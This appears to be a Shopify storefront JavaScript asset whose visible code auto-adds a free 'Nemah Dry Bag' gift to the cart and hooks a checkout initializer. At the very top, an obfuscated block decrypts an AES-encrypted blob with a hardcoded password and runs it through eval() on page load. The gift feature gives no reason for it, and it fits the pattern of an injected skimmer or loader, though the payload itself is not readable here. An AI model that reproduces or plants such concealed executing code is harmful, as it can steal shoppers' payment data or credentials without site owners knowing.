function a0_0x4237(_0x5d8e3c,_0x108762){var _0x478c06=a0_0x478c();return a0_0x4237=function(_0x423781,_0x22090f){_0x423781=_0x423781-0x141;var _0x3e0b68=_0x478c06[_0x423781];return _0x3e0b68;},a0_0x4237(_0x5d8e3c,_0x108762);}(function(_0x4a7861,_0x169fc3){var _0x57621f=a0_0x4237,_0x552f9b=_0x4a7861();while(!![]){try{var _0x227408=-parseInt(_0x57621f(0x152))/0x1*(parseInt(_0x57621f(0x144))/0x2)+-parseInt(_0x57621f(0x145))/0x3*(parseInt(_0x57621f(0x150))/0x4)+parseInt(_0x57621f(0x14f))/0x5*(parseInt(_0x57621f(0x143))/0x6)+parseInt(_0x57621f(0x14e))/0x7+parseInt(_0x57621f(0x141))/0x8*(parseInt(_0x57621f(0x149))/0x9)+parseInt(_0x57621f(0x14b))/0xa+parseInt(_0x57621f(0x151))/0xb*(-parseInt(_0x57621f(0x146))/0xc);if(_0x227408===_0x169fc3)break;else _0x552f9b['push'](_0x552f9b['shift']());}catch(_0x2fdf11){_0x552f9b['push'](_0x552f9b['shift']());}}}(a0_0x478c,0x8aa60),(function(){var _0x3e5e87=a0_0x4237,_0x1d9f7c='U2FsdGVkX1/7V9s3uUWe9pTSyDllSMN7iduC89tQ6v/S5mv2XT15SNoQKWXWpZG74xCmm+V5DqwervTU4KaN7YvfVOmmzR5BfHEfiaxzYmcKhaXuZAWLacj9L9TL6TyOa+2KT3LHc4uevvb7YhCQO2R1WcGX28vtOTpegMkTHg8lOncyGNVjbMITrEeYSM84zHArcQx6YVtnuRpVY5sPxLn1ruUTmhrGu1NQL8v7lziG3oB72adeyngyuXLk06vWzy68+Rfq7ljBQsrOMh6f9VxMv8nVHOhvcLZQC1RZYopbr4w074FSORTzhqIrli2yesoEF5WrdJ7d4zk7JDj2cLZcOPqikAQ8vXceaii1zO18tt8ENUz9bOsv1MiFpKmoqJQxmHMKgwzt3DiQ/M8apGRr66LbI2BO3xj/vZ6xCpNmDzA8J9qbj0aiQkJa9NIKV4s3qPJ/fa/4orUX06ZOvF891Y2o3OaPKt+8tK3kiRh79FKhyR1LSUawQzc1VlTuMCNDnrtvlN3MB+dE88I6ZWIDTBlOIXegjczoALdl/M2qSqSskLh1b8vGSjL12IjM3NIMPRHOA1J2+BAHGI+n/U/3vSJzxvKim+w4ozvm5kTQGwjM2ygbg+ZfLUTY28ezig4c9SozK7w11981t0og/GqF+owvkpRZA0e5+0fvdUlHeUB6ka4qXP3UXb/oB7QNxUsuk27iQNQNft9puR7xUQMiSBuQIM9D0u0s0sLd+3ZXiBaTFb870JAbm1HHPb8i5wKaPe2jubcEqzwS5j1XiYaIHnYObrR6LitclWG9y+dFsu2Ef6KfWosIOvmCpcf3coG3F4rccllD4mEj2Yz1qLNpJFirLzSTxj0vZ5dIFOdYf6JmithEj2aG7HXFhudRuzK1WOmbPOkAz2FR2PSNoklcUIUKztqLeQBdzVa4UohPUOGVN+pkALznNrIp6TQjlV2X63hxeWq0U61HTUroVVVvOGfViAKqRUhIHxziJ5CrljZNZ0NWW64oGtIgRYcTjlN6/Ejd03xtprIDSKKCl+NJZo+5heUNKYi+SPJ9KFFsbGxQwwv8HjvS9RIIRKqM+OzfKEYPA6/EZ3rN1L/vtt7Z/u8O2zhu2+eP+Cm7xDB0oUz0oLQQdDtjtg0nYtw+nyRdrrqelj8OnE6/2iEDPm4nUj7G6DYM6BnIKOmq+wc0chlWQAYfr0jtsK2ipBTdDHvss5N0FunGDlkYigXkaUeVu7XSl/eb2Stc+RHO0igCocz8Cs3axzQ0SGcyqNG9n1RW4Bq73xHohTeYwdgqSUfymTjVYGk8MKCoF3kZduVUtG/WTjDvooJKvyVT7TbF6iUG7jt3NpDvjnBEHJAM9bakOXQ0DCpMJ/1GpoNXOVr0/TXd2J7NvyxBQmqQ1fgdCQ1yx3wV7535oEeWwrQJKRn5ZcipSeTgaVv8J7/0VEA8u+WxCvCuiOYgjeXIVlxrqJywzAMdgmbt8H3bFlRuEqNyu/YvmokvKl/0lH21SzjRaqYgvvnCIzBWzBhHybwQ0dAsmrTQqKth/A9/fTctiR14KCMuwbOA1BZRrmcwpX/2856rw1K0SRsnxHRdPEjZzbS62b6eCPlBhaNEVuHqMEm3/UVNFM5tZ6sMQJJm2ZNPohLn+4wU98oXZ+44j5FQ4INmGI7x9g90FPPW09jeC4nmVkC+qVq5RN+tb1KzLcclm56ps7Bj2lH+zbJVE+hoEKm5Mx84+C8WTVnRjIF7q9405N53jD80E0sMwS+Q2iiT2ml3uyjiE+DV0B8dBHbDeTXM2iXvBKg/08lPOPtKcDnNA3P2PdY9q27kbySkzrHY9l3S6VJbvzKwsjlcMsHcpX+1t0w2lbB1Su5+xAk9aFcYGDnUSfyw7x0AAJfFlsirHnsxgWDRFeoM1gl6ocrxNpVqyrYZs+OSbVjNJXDx4g==',_0x1069b8='supercalifragilisticexpialidocious',_0x32c832=CryptoJS[_0x3e5e87(0x14c)][_0x3e5e87(0x148)](_0x1d9f7c,_0x1069b8)[_0x3e5e87(0x147)](CryptoJS[_0x3e5e87(0x14a)]['Utf8']);if(!_0x32c832){console[_0x3e5e87(0x142)](_0x3e5e87(0x14d));return;}eval(_0x32c832);}()));function a0_0x478c(){var _0x28c5b8=['18LLXfoG','enc','2857380KfIMnd','AES','Decryption\x20failed!\x20Check\x20the\x20password.','3014557nuABTj','3974835uchzoW','23724fjuOuH','55KBKPht','1Gmrgyx','1658856jAkeGI','error','6vLwsVk','54446fHEJaE','54tpmfLj','2938044OiVLDK','toString','decrypt'];a0_0x478c=function(){return _0x28c5b8;};return a0_0x478c();}
/* =========================================================
   NEMAH FREE DRY BAG - AUTO ADD + CART DRAWER REFRESH
   ========================================================= */

(function () {

  const FREE_GIFT_VARIANT_ID = 46145465090095;
  let syncingGift = false;

  async function getCart() {
    const response = await fetch('/cart.js', {
      credentials: 'same-origin'
    });

    if (!response.ok) throw new Error('Unable to read cart');

    return response.json();
  }

  function refreshCartSections(sections) {
    if (!sections) return;

    const cart = document.querySelector('cart-container');

    if (cart && typeof cart.reloadCartElements === 'function') {
      cart.reloadCartElements(sections);
    }
  }

  async function addGift() {

    const response = await fetch('/cart/add.js', {
      method: 'POST',

      headers: {
        'Content-Type': 'application/json',
        'Accept': 'application/json'
      },

      credentials: 'same-origin',

      body: JSON.stringify({
        items: [{
          id: FREE_GIFT_VARIANT_ID,
          quantity: 1,
          properties: {
            '_free_gift': 'Nemah Dry Bag'
          }
        }],

        sections: [
          'cart-count-badge',
          'offcanvas-cart'
        ],

        sections_url: window.location.pathname
      })
    });

    const data = await response.json();

    if (!response.ok) {
      console.error('Free gift add error:', data);
      throw new Error(data.description || 'Unable to add free gift');
    }

    refreshCartSections(data.sections);

    return data;
  }

  async function changeGift(lineKey, quantity) {

    const response = await fetch('/cart/change.js', {
      method: 'POST',

      headers: {
        'Content-Type': 'application/json',
        'Accept': 'application/json'
      },

      credentials: 'same-origin',

      body: JSON.stringify({
        id: lineKey,
        quantity: quantity,

        sections: [
          'cart-count-badge',
          'offcanvas-cart'
        ],

        sections_url: window.location.pathname
      })
    });

    const data = await response.json();

    if (!response.ok) {
      console.error('Free gift change error:', data);
      throw new Error(data.description || 'Unable to update free gift');
    }

    refreshCartSections(data.sections);

    return data;
  }

  async function syncFreeGift() {

    if (syncingGift) return;

    syncingGift = true;

    try {

      const cart = await getCart();

      const giftItems = cart.items.filter(function(item) {
        return Number(item.variant_id) === FREE_GIFT_VARIANT_ID;
      });

      const normalItems = cart.items.filter(function(item) {
        return Number(item.variant_id) !== FREE_GIFT_VARIANT_ID;
      });


      /* PAID PRODUCT EXISTS */
      if (normalItems.length > 0) {

        if (giftItems.length === 0) {

          await addGift();

        } else if (giftItems[0].quantity !== 1) {

          await changeGift(
            giftItems[0].key,
            1
          );

        }

      }


      /* ONLY GIFT REMAINS */
      else if (giftItems.length > 0) {

        for (const gift of giftItems) {

          await changeGift(
            gift.key,
            0
          );

        }

      }

    } catch (error) {

      console.warn(
        'Free gift sync:',
        error
      );

    } finally {

      syncingGift = false;

    }
  }


  /* Make available for checkout integration */
  window.nemahSyncFreeGift = syncFreeGift;


  /* PAGE LOAD */
  document.addEventListener(
    'DOMContentLoaded',
    syncFreeGift
  );


  window.addEventListener(
    'pageshow',
    syncFreeGift
  );


  /* =========================================
     JHANGO'S ACTUAL CART EVENTS
     ========================================= */

  window.addEventListener(
    'kt.cart.added',
    function () {

      setTimeout(
        syncFreeGift,
        150
      );

    }
  );


  window.addEventListener(
    'kt.cart.changed',
    function () {

      setTimeout(
        syncFreeGift,
        150
      );

    }
  );


  /* =========================================
     1CHECKOUT
     ========================================= */

  function patchOneCheckout() {

    if (
      typeof window.oneCheckout === 'undefined' ||
      typeof window.oneCheckout.initialize1Checkout !== 'function'
    ) {

      setTimeout(
        patchOneCheckout,
        250
      );

      return;

    }

    if (
      window.oneCheckout.__nemahGiftPatched
    ) return;


    const originalInitialize =
      window.oneCheckout
        .initialize1Checkout
        .bind(window.oneCheckout);


    window.oneCheckout.initialize1Checkout =
      async function () {

        try {

          await syncFreeGift();

        } catch (e) {

          console.warn(
            'Gift sync before checkout failed',
            e
          );

        }

        return originalInitialize();

      };


    window.oneCheckout.__nemahGiftPatched = true;

  }


  patchOneCheckout();

})();